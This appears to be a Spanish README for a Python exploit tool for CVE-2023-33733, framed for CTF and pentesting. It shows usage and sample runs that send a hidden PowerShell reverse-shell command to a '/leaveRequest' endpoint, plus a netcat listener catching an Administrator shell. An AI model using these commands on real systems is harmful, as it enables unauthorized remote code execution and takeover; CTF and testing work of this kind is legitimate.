
Script de explotación en Python para CVE-2023-33733 dirigido a aplicaciones web. Automatiza la autenticación, extracción de sesión y entrega de reverse shell para pruebas de penetración y entornos CTF.
No descubrí ni me atribuyo el mérito de encontrar esta vulnerabilidad. Este es simplemente un script que construí para explotar más fácilmente esta vulnerabilidad para un CTF. Para la información original, consulte: https://github.com/c53elyas/CVE-2023-33733
Este script está pensado simplemente como un script rápido en Python3 para explotar CVE-2023-33733. Necesitará proporcionar el host, puerto, comando y una cookie de sesión válida.
kali@kali:~/Desktop$ python3 exp.py --help
usage: foothold.py [-h] --host HOST --port PORT --cmd CMD --session SESSION
options:
-h, --help show this help message and exit
--host HOST
--port PORT, -p PORT
--cmd CMD, -c CMD
--username USERNAME, -u USERNAME
--password PASSWORD, -ps PASSWORD
--session SESSION, --cookie SESSION, -sc SESSION
Session cookie
kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <su código de revshell aquí>" --username "<su nombre de usuario aquí>" --password "<su contraseña aquí>"
[*] Iniciando sesión en http://vuln.server:80
Cookie de sesión recuperada: SESSION=...
[*] Extrayendo token de sesión...
[*] Token extraído: .abc.xyz
[*] Construyendo exploit...
[*] Exploit construido
[*] Preparando solicitud
[*] Enviando solicitud a http://vuln.server:80/leaveRequest
[*] Enviar una reverse shell debería hacer que la solicitud se cuelgue
[*] Solicitud enviada
[*] Éxito probable. Código de estado 504
kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <su código de revshell aquí>" --session "<su cookie aquí>"
[*] Construyendo exploit...
[*] Exploit construido
[*] Preparando solicitud
[*] Enviando solicitud a http://vuln.server:80/leaveRequest
[*] Enviar una reverse shell debería hacer que la solicitud se cuelgue
[*] Solicitud enviada
[*] Éxito probable. Código de estado 500
# Listener
kali@kali:~/Desktop$ nc -lnvp 9001
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.1] 50246
whoami
Administrator